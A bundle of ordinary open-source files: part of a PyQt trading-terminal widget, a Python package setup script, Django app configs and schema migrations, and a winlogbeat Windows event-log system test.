exchange = unicode(self.comboExchange.currentText())
currency = unicode(self.comboCurrency.currentText())
productClass = unicode(self.comboProductClass.currentText())
gatewayName = unicode(self.comboGateway.currentText())
# 查询合约
if exchange:
vtSymbol = '.'.join([symbol, exchange])
contract = self.mainEngine.getContract(vtSymbol)
else:
vtSymbol = symbol
contract = self.mainEngine.getContract(symbol)
if contract:
gatewayName = contract.gatewayName
exchange = contract.exchange # 保证有交易所代码
req = VtOrderReq()
req.symbol = symbol
req.exchange = exchange
req.price = self.spinPrice.value()
req.volume = self.spinVolume.value()
req.direction = unicode(self.comboDirection.currentText())
req.priceType = unicode(self.comboPriceType.currentText())
req.offset = unicode(self.comboOffset.currentText())
req.currency = currency
req.productClass = productClass
self.mainEngine.sendOrder(req, gatewayName)
#----------------------------------------------------------------------
def cancelAll(self):
"""一键撤销所有委托"""
l = self.mainEngine.getAllWorkingOrders()
for order in l:
req = VtCancelOrderReq()
req.symbol = order.symbol
req.exchange = order.exchange
req.frontID = order.frontID
req.sessionID = order.sessionID
req.orderID = order.orderID
self.mainEngine.cancelOrder(req, order.gatewayName)
#----------------------------------------------------------------------
def closePosition(self, cell):
"""根据持仓信息自动填写交易组件"""
# 读取持仓数据,cell是一个表格中的单元格对象
pos = cell.data
symbol = pos.symbol
# 更新交易组件的显示合约
self.lineSymbol.setText(symbol)
self.updateSymbol()
# 自动填写信息
self.comboPriceType.setCurrentIndex(self.priceTypeList.index(PRICETYPE_LIMITPRICE))
self.comboOffset.setCurrentIndex(self.offsetList.index(OFFSET_CLOSE))
self.spinVolume.setValue(pos.position)
if pos.direction == DIRECTION_LONG or pos.direction == DIRECTION_NET:
self.comboDirection.setCurrentIndex(self.directionList.index(DIRECTION_SHORT))
else:
self.comboDirection.setCurrentIndex(self.directionList.index(DIRECTION_LONG))
# 价格留待更新后由用户输入,防止有误操作
########################################################################
class ContractMonitor(BasicMonitor):
    """Contract query window: lists every contract known to the main engine."""

    #----------------------------------------------------------------------
    def __init__(self, mainEngine, parent=None):
        """Constructor.

        mainEngine: the application's main engine, used to fetch contracts.
        """
        super(ContractMonitor, self).__init__(parent=parent)
        self.mainEngine = mainEngine
        # Column layout: attribute name -> display header and cell renderer.
        d = OrderedDict()
        d['symbol'] = {'chinese':u'合约代码', 'cellType':BasicCell}
        d['exchange'] = {'chinese':u'交易所', 'cellType':BasicCell}
        d['vtSymbol'] = {'chinese':u'vt系统代码', 'cellType':BasicCell}
        d['name'] = {'chinese':u'名称', 'cellType':BasicCell}
        d['productClass'] = {'chinese':u'合约类型', 'cellType':BasicCell}
        d['size'] = {'chinese':u'大小', 'cellType':BasicCell}
        d['priceTick'] = {'chinese':u'最小价格变动', 'cellType':BasicCell}
        #d['strikePrice'] = {'chinese':u'期权行权价', 'cellType':BasicCell}
        #d['underlyingSymbol'] = {'chinese':u'期权标的物', 'cellType':BasicCell}
        #d['optionType'] = {'chinese':u'期权类型', 'cellType':BasicCell}
        self.setHeaderDict(d)
        self.initUi()

    #----------------------------------------------------------------------
    def initUi(self):
        """Initialize the window title, size, font and the table itself."""
        self.setWindowTitle(u'合约查询')
        self.setMinimumSize(800, 800)
        self.setFont(BASIC_FONT)
        self.initTable()
        self.addMenuAction()

    #----------------------------------------------------------------------
    def showAllContracts(self):
        """Fill the table with all contract data, keys sorted descending."""
        contractList = self.mainEngine.getAllContracts()
        d = {'.'.join([contract.exchange, contract.symbol]): contract
             for contract in contractList}
        self.setRowCount(len(d))
        # sorted() instead of list.sort() on dict.keys(): identical order,
        # but also works on Python 3 where keys() is a non-sortable view.
        for row, key in enumerate(sorted(d, reverse=True)):
            contract = d[key]
            for n, header in enumerate(self.headerList):
                # getattr is the idiomatic spelling of __getattribute__(header)
                content = safeUnicode(getattr(contract, header))
                cellType = self.headerDict[header]['cellType']
                cell = cellType(content)
                if self.font:
                    cell.setFont(self.font)  # apply the configured table font
                self.setItem(row, n, cell)

    #----------------------------------------------------------------------
    def refresh(self):
        """Reload the table contents."""
        self.menu.close()  # close the context menu before redrawing
        self.clearContents()
        self.setRowCount(0)
        self.showAllContracts()

    #----------------------------------------------------------------------
    def addMenuAction(self):
        """Add the refresh entry to the right-click context menu."""
        refreshAction = QtGui.QAction(u'刷新', self)
        refreshAction.triggered.connect(self.refresh)
        self.menu.addAction(refreshAction)

    #----------------------------------------------------------------------
    def show(self):
        """Show the window and immediately refresh its contents."""
        super(ContractMonitor, self).show()
        self.refresh()
|
{
"content_hash": "ffdc7dd38e4a1bd2b7558ba5639284b8",
"timestamp": "",
"source": "github",
"line_count": 1115,
"max_line_length": 91,
"avg_line_length": 36.75874439461884,
"alnum_prop": 0.49931683989655007,
"repo_name": "freeitaly/Trading-System",
"id": "691500344d3179701977adfc2044c160f72dbb91",
"size": "43495",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vn.trader/uiBasicWidget.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "2004570"
},
{
"name": "C++",
"bytes": "4252575"
},
{
"name": "CMake",
"bytes": "7062"
},
{
"name": "Jupyter Notebook",
"bytes": "10948"
},
{
"name": "Objective-C",
"bytes": "139190"
},
{
"name": "Python",
"bytes": "5255125"
},
{
"name": "R",
"bytes": "1354"
},
{
"name": "Shell",
"bytes": "5174"
}
],
"symlink_target": ""
}
|
"""Main setup script for GLUDB."""
from codecs import open
from os import path
# Always prefer setuptools over distutils
from setuptools import setup
here = path.abspath(path.dirname(__file__))
# Get the long description from the relevant file
# Note that we are using README.rst - it is generated from README.md in
# build.sh
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='gludb',
version='0.2.0',
description='A simple database wrapper',
long_description=long_description,
url='https://github.com/memphis-iis/GLUDB',
author='University of Memphis Institute for Intelligent Systems',
author_email='cnkelly@memphis.edu',
license='Apache Version 2.0',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Database',
'Topic :: Software Development :: Libraries',
'Topic :: System :: Archiving :: Backup',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
keywords='database versioning backup'
'sqlite dynamodb cloud datastore mongodb',
packages=['gludb', 'gludb.backends'],
install_requires=[
"json_delta>=1.1.3",
],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
'dev': [],
'test': ['coverage', 'nose', 'tornado'],
'dynamodb': ['boto'],
'gcd': ['googledatastore'],
'mongodb': ['pymongo'],
'postgresql': ['psycopg2'],
'backups': ['boto'],
},
package_data={},
data_files=[],
entry_points={},
)
|
{
"content_hash": "f3505846f4c12f9bd5679617c35dc665",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 71,
"avg_line_length": 29.027397260273972,
"alnum_prop": 0.6087777253421425,
"repo_name": "memphis-iis/GLUDB",
"id": "3c021d769dbe9e48ca669a58ff129de5d79e3ab0",
"size": "2119",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "118902"
},
{
"name": "Shell",
"bytes": "7570"
}
],
"symlink_target": ""
}
|
from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class DjangoTwitterPhotoApiConfig(AppConfig):
    """Django app configuration for the Twitter photostream backend."""
    name = 'django_twitter_photo_api'
    verbose_name = _("Twitter photostream backend")
|
{
"content_hash": "dc4b7e1b50e135f8ff92e18e6d2a0b52",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 54,
"avg_line_length": 32.285714285714285,
"alnum_prop": 0.7787610619469026,
"repo_name": "softformance/django-twitter-photo-api",
"id": "6be37050acb25f10bc7090520a99c358f550f757",
"size": "246",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_twitter_photo_api/apps.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1874"
},
{
"name": "Makefile",
"bytes": "1626"
},
{
"name": "Python",
"bytes": "30209"
}
],
"symlink_target": ""
}
|
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration (auto-generated): introduces the
    ProgramObservation model and strips the per-observation metric/trend/
    summary columns from ProgramInfo, which now live on ProgramObservation."""
    def forwards(self, orm):
        """Apply: create the ProgramObservation table, drop the moved columns."""
        # Adding model 'ProgramObservation'
        db.create_table(u'director_programobservation', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('last_updated', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, null=True, blank=True)),
            ('rating_count', self.gf('django.db.models.fields.IntegerField')(default=1, max_length=1000)),
            ('observation_entered', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, null=True, blank=True)),
            ('entered_by', self.gf('django.db.models.fields.related.ForeignKey')(max_length=250, to=orm['auth.User'], null=True, blank=True)),
            ('program', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['director.ProgramInfo'])),
            ('metric_cost', self.gf('django.db.models.fields.CharField')(default='Yellow', max_length=10)),
            ('trend_cost', self.gf('django.db.models.fields.CharField')(default='Middle', max_length=10)),
            ('summary_cost', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
            ('metric_schedule', self.gf('django.db.models.fields.CharField')(default='Yellow', max_length=10)),
            ('trend_schedule', self.gf('django.db.models.fields.CharField')(default='Middle', max_length=10)),
            ('summary_schedule', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
            ('metric_performance', self.gf('django.db.models.fields.CharField')(default='Yellow', max_length=10)),
            ('trend_performance', self.gf('django.db.models.fields.CharField')(default='Middle', max_length=10)),
            ('summary_performance', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
            ('metric_risk', self.gf('django.db.models.fields.CharField')(default='Yellow', max_length=10)),
            ('trend_risk', self.gf('django.db.models.fields.CharField')(default='Middle', max_length=10)),
            ('summary_risk', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
        ))
        db.send_create_signal(u'director', ['ProgramObservation'])
        # Deleting field 'ProgramInfo.last_updated'
        db.delete_column(u'director_programinfo', 'last_updated')
        # Deleting field 'ProgramInfo.rating_count'
        db.delete_column(u'director_programinfo', 'rating_count')
        # Deleting field 'ProgramInfo.trend_schedule'
        db.delete_column(u'director_programinfo', 'trend_schedule')
        # Deleting field 'ProgramInfo.metric_cost'
        db.delete_column(u'director_programinfo', 'metric_cost')
        # Deleting field 'ProgramInfo.trend_performance'
        db.delete_column(u'director_programinfo', 'trend_performance')
        # Deleting field 'ProgramInfo.metric_performance'
        db.delete_column(u'director_programinfo', 'metric_performance')
        # Deleting field 'ProgramInfo.metric_risk'
        db.delete_column(u'director_programinfo', 'metric_risk')
        # Deleting field 'ProgramInfo.trend_risk'
        db.delete_column(u'director_programinfo', 'trend_risk')
        # Deleting field 'ProgramInfo.summary_schedule'
        db.delete_column(u'director_programinfo', 'summary_schedule')
        # Deleting field 'ProgramInfo.summary_cost'
        db.delete_column(u'director_programinfo', 'summary_cost')
        # Deleting field 'ProgramInfo.created'
        db.delete_column(u'director_programinfo', 'created')
        # Deleting field 'ProgramInfo.metric_schedule'
        db.delete_column(u'director_programinfo', 'metric_schedule')
        # Deleting field 'ProgramInfo.summary_risk'
        db.delete_column(u'director_programinfo', 'summary_risk')
        # Deleting field 'ProgramInfo.summary_performance'
        db.delete_column(u'director_programinfo', 'summary_performance')
        # Deleting field 'ProgramInfo.trend_cost'
        db.delete_column(u'director_programinfo', 'trend_cost')
    def backwards(self, orm):
        """Unapply: drop ProgramObservation, restore the columns on ProgramInfo."""
        # Deleting model 'ProgramObservation'
        db.delete_table(u'director_programobservation')
        # Adding field 'ProgramInfo.last_updated'
        db.add_column(u'director_programinfo', 'last_updated',
                      self.gf('django.db.models.fields.DateTimeField')(auto_now=True, null=True, blank=True),
                      keep_default=False)
        # Adding field 'ProgramInfo.rating_count'
        db.add_column(u'director_programinfo', 'rating_count',
                      self.gf('django.db.models.fields.IntegerField')(default=1, max_length=1000),
                      keep_default=False)
        # Adding field 'ProgramInfo.trend_schedule'
        db.add_column(u'director_programinfo', 'trend_schedule',
                      self.gf('django.db.models.fields.CharField')(default='Middle', max_length=10),
                      keep_default=False)
        # Adding field 'ProgramInfo.metric_cost'
        db.add_column(u'director_programinfo', 'metric_cost',
                      self.gf('django.db.models.fields.CharField')(default='Yellow', max_length=10),
                      keep_default=False)
        # Adding field 'ProgramInfo.trend_performance'
        db.add_column(u'director_programinfo', 'trend_performance',
                      self.gf('django.db.models.fields.CharField')(default='Middle', max_length=10),
                      keep_default=False)
        # Adding field 'ProgramInfo.metric_performance'
        db.add_column(u'director_programinfo', 'metric_performance',
                      self.gf('django.db.models.fields.CharField')(default='Yellow', max_length=10),
                      keep_default=False)
        # Adding field 'ProgramInfo.metric_risk'
        db.add_column(u'director_programinfo', 'metric_risk',
                      self.gf('django.db.models.fields.CharField')(default='Yellow', max_length=10),
                      keep_default=False)
        # Adding field 'ProgramInfo.trend_risk'
        db.add_column(u'director_programinfo', 'trend_risk',
                      self.gf('django.db.models.fields.CharField')(default='Middle', max_length=10),
                      keep_default=False)
        # Adding field 'ProgramInfo.summary_schedule'
        db.add_column(u'director_programinfo', 'summary_schedule',
                      self.gf('django.db.models.fields.TextField')(null=True, blank=True),
                      keep_default=False)
        # Adding field 'ProgramInfo.summary_cost'
        db.add_column(u'director_programinfo', 'summary_cost',
                      self.gf('django.db.models.fields.TextField')(null=True, blank=True),
                      keep_default=False)
        # Adding field 'ProgramInfo.created'
        db.add_column(u'director_programinfo', 'created',
                      self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, default=datetime.datetime(2013, 10, 3, 0, 0), blank=True),
                      keep_default=False)
        # Adding field 'ProgramInfo.metric_schedule'
        db.add_column(u'director_programinfo', 'metric_schedule',
                      self.gf('django.db.models.fields.CharField')(default='Yellow', max_length=10),
                      keep_default=False)
        # Adding field 'ProgramInfo.summary_risk'
        db.add_column(u'director_programinfo', 'summary_risk',
                      self.gf('django.db.models.fields.TextField')(null=True, blank=True),
                      keep_default=False)
        # Adding field 'ProgramInfo.summary_performance'
        db.add_column(u'director_programinfo', 'summary_performance',
                      self.gf('django.db.models.fields.TextField')(null=True, blank=True),
                      keep_default=False)
        # Adding field 'ProgramInfo.trend_cost'
        db.add_column(u'director_programinfo', 'trend_cost',
                      self.gf('django.db.models.fields.CharField')(default='Middle', max_length=10),
                      keep_default=False)
    # Frozen ORM snapshot used by South to reconstruct models at this
    # point in history - auto-generated, do not edit by hand.
    models = {
        u'auth.group': {
            'Meta': {'object_name': 'Group'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        u'auth.permission': {
            'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        u'director.dashboardwidgets': {
            'Meta': {'ordering': "['order']", 'object_name': 'DashboardWidgets'},
            'dashboard': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['director.DirectorDashboard']"}),
            'height': ('django.db.models.fields.IntegerField', [], {'default': '250', 'max_length': '3'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'order': ('django.db.models.fields.IntegerField', [], {}),
            'widget': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['director.PageWidget']"}),
            'width': ('django.db.models.fields.IntegerField', [], {'default': '6', 'max_length': '2'})
        },
        u'director.directordashboard': {
            'Meta': {'ordering': "['org']", 'object_name': 'DirectorDashboard'},
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
            'org': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
            'owner': ('django.db.models.fields.related.ForeignKey', [], {'max_length': '250', 'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
            'page_widgets': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['director.PageWidget']", 'null': 'True', 'through': u"orm['director.DashboardWidgets']", 'blank': 'True'}),
            'related_programs': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['director.ProgramInfo']", 'null': 'True', 'blank': 'True'}),
            'site_icon': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
            'status': ('django.db.models.fields.IntegerField', [], {'default': '1', 'max_length': '1'}),
            'tags': ('django.db.models.fields.CharField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
            'tracking_code': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
            'type': ('django.db.models.fields.CharField', [], {'default': "'Portal'", 'max_length': '10'})
        },
        u'director.pagewidget': {
            'Meta': {'ordering': "['name']", 'object_name': 'PageWidget'},
            'data_json': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'icon': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '20'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'iframe_url': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'iframe_url_if_local': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
            'render_function': ('django.db.models.fields.CharField', [], {'default': "'notesAndChildNotes'", 'max_length': '60'}),
            'subtext': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '30', 'null': 'True', 'blank': 'True'}),
            'theme': ('django.db.models.fields.CharField', [], {'default': "'Thin'", 'max_length': '10'}),
            'type': ('django.db.models.fields.CharField', [], {'default': "'Wiki'", 'max_length': '10'}),
            'url': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
        },
        u'director.programinfo': {
            'Meta': {'ordering': "['name']", 'object_name': 'ProgramInfo'},
            'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'management_poc': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
            'technical_poc': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
            'url': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
        },
        u'director.programobservation': {
            'Meta': {'object_name': 'ProgramObservation'},
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'entered_by': ('django.db.models.fields.related.ForeignKey', [], {'max_length': '250', 'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
            'metric_cost': ('django.db.models.fields.CharField', [], {'default': "'Yellow'", 'max_length': '10'}),
            'metric_performance': ('django.db.models.fields.CharField', [], {'default': "'Yellow'", 'max_length': '10'}),
            'metric_risk': ('django.db.models.fields.CharField', [], {'default': "'Yellow'", 'max_length': '10'}),
            'metric_schedule': ('django.db.models.fields.CharField', [], {'default': "'Yellow'", 'max_length': '10'}),
            'observation_entered': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
            'program': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['director.ProgramInfo']"}),
            'rating_count': ('django.db.models.fields.IntegerField', [], {'default': '1', 'max_length': '1000'}),
            'summary_cost': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'summary_performance': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'summary_risk': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'summary_schedule': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'trend_cost': ('django.db.models.fields.CharField', [], {'default': "'Middle'", 'max_length': '10'}),
            'trend_performance': ('django.db.models.fields.CharField', [], {'default': "'Middle'", 'max_length': '10'}),
            'trend_risk': ('django.db.models.fields.CharField', [], {'default': "'Middle'", 'max_length': '10'}),
            'trend_schedule': ('django.db.models.fields.CharField', [], {'default': "'Middle'", 'max_length': '10'})
        }
    }
    complete_apps = ['director']
|
{
"content_hash": "ac6a5f748dcb8863fa69d9fa7d183c28",
"timestamp": "",
"source": "github",
"line_count": 270,
"max_line_length": 228,
"avg_line_length": 68.75925925925925,
"alnum_prop": 0.5838405601939133,
"repo_name": "ngageoint/geoevents",
"id": "f440364c41c792a508b5b2b8fff3d8b8e49b7efe",
"size": "18589",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "geoevents/director/migrations/0015_auto__add_programobservation__del_field_programinfo_last_updated__del_.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "7006"
},
{
"name": "CSS",
"bytes": "169395"
},
{
"name": "JavaScript",
"bytes": "10629452"
},
{
"name": "Python",
"bytes": "1589774"
},
{
"name": "Shell",
"bytes": "4212"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations
import django.db.models.manager
class Migration(migrations.Migration):
    """Auto-generated Django migration: re-declares model options and
    managers on the wallpost models so that 'objects_with_deleted' is the
    base manager and rows order by creation time."""
    dependencies = [
        ('wallposts', '0001_initial'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='reaction',
            options={'base_manager_name': 'objects_with_deleted', 'ordering': ('created',), 'verbose_name': 'Reaction', 'verbose_name_plural': 'Reactions'},
        ),
        migrations.AlterModelOptions(
            name='wallpost',
            options={'base_manager_name': 'objects_with_deleted', 'ordering': ('created',)},
        ),
        migrations.AlterModelManagers(
            name='mediawallpost',
            managers=[
                ('objects_with_deleted', django.db.models.manager.Manager()),
                ('base_objects', django.db.models.manager.Manager()),
            ],
        ),
        migrations.AlterModelManagers(
            name='reaction',
            managers=[
                ('objects', django.db.models.manager.Manager()),
                ('objects_with_deleted', django.db.models.manager.Manager()),
            ],
        ),
        migrations.AlterModelManagers(
            name='systemwallpost',
            managers=[
                ('objects_with_deleted', django.db.models.manager.Manager()),
                ('base_objects', django.db.models.manager.Manager()),
            ],
        ),
        migrations.AlterModelManagers(
            name='textwallpost',
            managers=[
                ('objects_with_deleted', django.db.models.manager.Manager()),
                ('base_objects', django.db.models.manager.Manager()),
            ],
        ),
        migrations.AlterModelManagers(
            name='wallpost',
            managers=[
                ('objects', django.db.models.manager.Manager()),
                ('objects_with_deleted', django.db.models.manager.Manager()),
            ],
        ),
    ]
|
{
"content_hash": "5caaeccba4bc4a67b8668213c1c14f6b",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 156,
"avg_line_length": 34.666666666666664,
"alnum_prop": 0.5394736842105263,
"repo_name": "onepercentclub/bluebottle",
"id": "80a472b8fa978d9b91c11a751720851b0b8d631e",
"size": "2049",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bluebottle/wallposts/migrations/0002_auto_20161115_1601.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "41694"
},
{
"name": "HTML",
"bytes": "246695"
},
{
"name": "Handlebars",
"bytes": "63"
},
{
"name": "JavaScript",
"bytes": "139123"
},
{
"name": "PHP",
"bytes": "35"
},
{
"name": "PLpgSQL",
"bytes": "1369882"
},
{
"name": "PostScript",
"bytes": "2927"
},
{
"name": "Python",
"bytes": "4983116"
},
{
"name": "Rich Text Format",
"bytes": "39109"
},
{
"name": "SCSS",
"bytes": "99555"
},
{
"name": "Shell",
"bytes": "3068"
},
{
"name": "Smarty",
"bytes": "3814"
}
],
"symlink_target": ""
}
|
import os
import platform
import sys
if sys.platform.startswith("win"):
import win32api
import win32con
import win32evtlog
import win32security
import win32evtlogutil
sys.path.append('../../../libbeat/tests/system')
from beat.beat import TestCase
class BaseTest(TestCase):
    """Base test case that pins the beat under test to winlogbeat."""

    @classmethod
    def setUpClass(cls):
        """Set the beat name before libbeat's common class setup runs."""
        # FIX: a classmethod's first argument is conventionally named 'cls',
        # not 'self' (PEP 8); the attribute is set on the class itself.
        cls.beat_name = "winlogbeat"
        super(BaseTest, cls).setUpClass()
class WriteReadTest(BaseTest):
    """System tests that write events into the Windows event log and check
    that winlogbeat reads them back with the expected fields."""

    providerName = "WinlogbeatTestPython"
    applicationName = "SystemTest"
    otherAppName = "OtherSystemTestApp"
    # Lazily-resolved caches shared across tests of this class.
    sid = None
    sidString = None
    api = None

    def setUp(self):
        """Register the two test event sources in the Windows registry."""
        super(WriteReadTest, self).setUp()
        win32evtlogutil.AddSourceToRegistry(self.applicationName,
                                            "%systemroot%\\system32\\EventCreate.exe",
                                            self.providerName)
        win32evtlogutil.AddSourceToRegistry(self.otherAppName,
                                            "%systemroot%\\system32\\EventCreate.exe",
                                            self.providerName)

    def tearDown(self):
        """Unregister the event sources and clear the test event log."""
        super(WriteReadTest, self).tearDown()
        win32evtlogutil.RemoveSourceFromRegistry(
            self.applicationName, self.providerName)
        win32evtlogutil.RemoveSourceFromRegistry(
            self.otherAppName, self.providerName)
        self.clear_event_log()

    def clear_event_log(self):
        """Remove every record from the test provider's event log."""
        hlog = win32evtlog.OpenEventLog(None, self.providerName)
        win32evtlog.ClearEventLog(hlog, None)
        win32evtlog.CloseEventLog(hlog)

    def write_event_log(self, message, eventID=10, sid=None,
                        level=None, source=None):
        """Write one event; defaults: current user's SID, the test
        application source, Information level."""
        # FIX: sentinel checks use 'is None' (PEP 8) instead of '== None',
        # which could invoke arbitrary __eq__ on pywin32 objects.
        if sid is None:
            sid = self.get_sid()
        if source is None:
            source = self.applicationName
        if level is None:
            level = win32evtlog.EVENTLOG_INFORMATION_TYPE
        win32evtlogutil.ReportEvent(source, eventID,
                                    eventType=level, strings=[message], sid=sid)

    def get_sid(self):
        """Return (and cache) the SID of the current process owner."""
        if self.sid is None:
            ph = win32api.GetCurrentProcess()
            th = win32security.OpenProcessToken(ph, win32con.TOKEN_READ)
            self.sid = win32security.GetTokenInformation(
                th, win32security.TokenUser)[0]
        return self.sid

    def get_sid_string(self):
        """Return (and cache) the current user's SID in string form."""
        if self.sidString is None:
            self.sidString = win32security.ConvertSidToStringSid(self.get_sid())
        return self.sidString

    def read_events(self, config=None, expected_events=1):
        """Run winlogbeat until *expected_events* events are written to the
        output file, then return the parsed output.

        config defaults to reading the test provider through self.api.
        """
        if config is None:
            config = {
                "event_logs": [
                    {"name": self.providerName, "api": self.api}
                ]
            }
        self.render_config_template(**config)
        proc = self.start_beat()
        self.wait_until(lambda: self.output_has(expected_events))
        proc.check_kill_and_wait()
        return self.read_output()

